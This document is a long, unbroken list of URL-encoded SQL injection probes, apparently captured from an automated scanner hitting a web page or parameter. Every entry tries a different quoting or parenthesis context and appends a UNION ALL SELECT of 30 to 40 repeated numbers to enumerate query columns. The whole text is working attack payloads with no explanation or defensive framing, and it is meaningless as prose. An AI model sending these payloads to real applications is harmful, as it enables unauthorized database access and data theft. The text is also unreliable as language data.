-5568%29%20UNION%20ALL%20SELECT%204192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192--%20 -1540%27%29%20UNION%20ALL%20SELECT%208528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528%2C8528--%20 -8996%27%29%20UNION%20ALL%20SELECT%201940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940%2C1940--%20 -6354%27%29%20UNION%20ALL%20SELECT%206031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031%2C6031--%20 -5119%27%29%20UNION%20ALL%20SELECT%206910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910--%20 -7134%27%29%20UNION%20ALL%20SELECT%207789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789--%20 -1171%27%29%20UNION%20ALL%20SELECT%208391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391--%20 -3588%27%29%20UNION%20ALL%20SELECT%207779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779%2C7779--%20 -4740%27%29%20UNION%20ALL%20SELECT%204967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967%2C4967--%20 -5878%27%29%20UNION%20ALL%20SELECT%206187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187--%20 -3864%27%29%20UNION%20ALL%20SELECT%207422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422%2C7422--%20 -9783%27%20UNION%20ALL%20SELECT%201120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120--%20 -2547%27%20UNION%20ALL%20SELECT%208645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645--%20 -4771%27%20UNION%20ALL%20SELECT%208155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155%2C8155--%20 -1705%27%20UNION%20ALL%20SELECT%206665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665--%20 -9093%27%20UNION%20ALL%20SELECT%205624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624%2C5624--%20 -8672%27%20UNION%20ALL%20SELECT%208688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688%2C8688--%20 -2632%27%20UNION%20ALL%20SELECT%205982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982%2C5982--%20 -4269%27%20UNION%20ALL%20SELECT%207878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878%2C7878--%20 -1069%27%20UNION%20ALL%20SELECT%203636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636--%20 -3525%27%20UNION%20ALL%20SELECT%204580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580--%20 -3860%22%20UNION%20ALL%20SELECT%202603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603--%20 -7828%22%20UNION%20ALL%20SELECT%204086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086--%20 -3029%22%20UNION%20ALL%20SELECT%209378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378%2C9378--%20 -4538%22%20UNION%20ALL%20SELECT%209891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891%2C9891--%20 -3157%22%20UNION%20ALL%20SELECT%202226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226%2C2226--%20 -6722%22%20UNION%20ALL%20SELECT%203585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585%2C3585--%20 -2256%22%20UNION%20ALL%20SELECT%202942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942%2C2942--%20 -1253%22%20UNION%20ALL%20SELECT%201106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106--%20 -1908%22%20UNION%20ALL%20SELECT%206083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083%2C6083--%20 -6007%22%20UNION%20ALL%20SELECT%205504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504--%20 -9212%29%20UNION%20ALL%20SELECT%208501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501--%20 -4480%29%20UNION%20ALL%20SELECT%203153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153%2C3153--%20 -1703%29%20UNION%20ALL%20SELECT%201401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401%2C1401--%20 -2788%29%20UNION%20ALL%20SELECT%208757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757--%20 -1513%29%20UNION%20ALL%20SELECT%208722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722%2C8722--%20 -7471%29%20UNION%20ALL%20SELECT%204283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283%2C4283--%20 -5562%29%20UNION%20ALL%20SELECT%207230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230%2C7230--%20 -6531%29%20UNION%20ALL%20SELECT%209469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469%2C9469--%20 -8540%29%20UNION%20ALL%20SELECT%201082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082%2C1082--%20 -4801%29%20UNION%20ALL%20SELECT%202276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276%2C2276--%20 -3507%29%29%20UNION%20ALL%20SELECT%202430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430%2C2430--%20 -3622%29%29%20UNION%20ALL%20SELECT%202099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099%2C2099--%20 -3837%29%29%20UNION%20ALL%20SELECT%203154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154%2C3154--%20 -7248%29%29%20UNION%20ALL%20SELECT%207889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889--%20 -9483%29%29%20UNION%20ALL%20SELECT%205578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578%2C5578--%20 -6317%29%29%20UNION%20ALL%20SELECT%208327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327%2C8327--%20 -5014%29%29%20UNION%20ALL%20SELECT%202672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672%2C2672--%20 -6931%29%29%20UNION%20ALL%20SELECT%206778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778--%20 -2560%29%29%20UNION%20ALL%20SELECT%206601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601%2C6601--%20 -2796%29%29%20UNION%20ALL%20SELECT%201882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882%2C1882--%20 -6244%29%29%29%20UNION%20ALL%20SELECT%202767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767%2C2767--%20 -4993%29%29%29%20UNION%20ALL%20SELECT%201285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285%2C1285--%20 -6380%29%29%29%20UNION%20ALL%20SELECT%206678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678%2C6678--%20 -9133%29%29%29%20UNION%20ALL%20SELECT%203362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362%2C3362--%20 -8946%29%29%29%20UNION%20ALL%20SELECT%202156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156%2C2156--%20 -1543%29%29%29%20UNION%20ALL%20SELECT%204240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240%2C4240--%20 -8075%29%29%29%20UNION%20ALL%20SELECT%208587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587--%20 -1374%29%29%29%20UNION%20ALL%20SELECT%205657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657%2C5657--%20 -6653%29%29%29%20UNION%20ALL%20SELECT%205586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586%2C5586--%20 -9084%29%29%29%20UNION%20ALL%20SELECT%205964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964--%20 -6709%20UNION%20ALL%20SELECT%208612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612%2C8612--%20 -8350%20UNION%20ALL%20SELECT%204657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657--%20 -2693%20UNION%20ALL%20SELECT%203990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990--%20 -4664%20UNION%20ALL%20SELECT%208411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411%2C8411--%20 -3149%20UNION%20ALL%20SELECT%201264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264--%20 -2973%20UNION%20ALL%20SELECT%204083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083--%20 -2761%20UNION%20ALL%20SELECT%208689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689--%20 -2109%20UNION%20ALL%20SELECT%209256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256%2C9256--%20 -7063%20UNION%20ALL%20SELECT%205964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964%2C5964--%20 -2549%20UNION%20ALL%20SELECT%205567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567%2C5567--%20 -5766%27%29%20UNION%20ALL%20SELECT%207001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001%2C7001--%20 -6884%27%29%20UNION%20ALL%20SELECT%209461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461--%20 -1509%27%29%20UNION%20ALL%20SELECT%205924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924%2C5924--%20 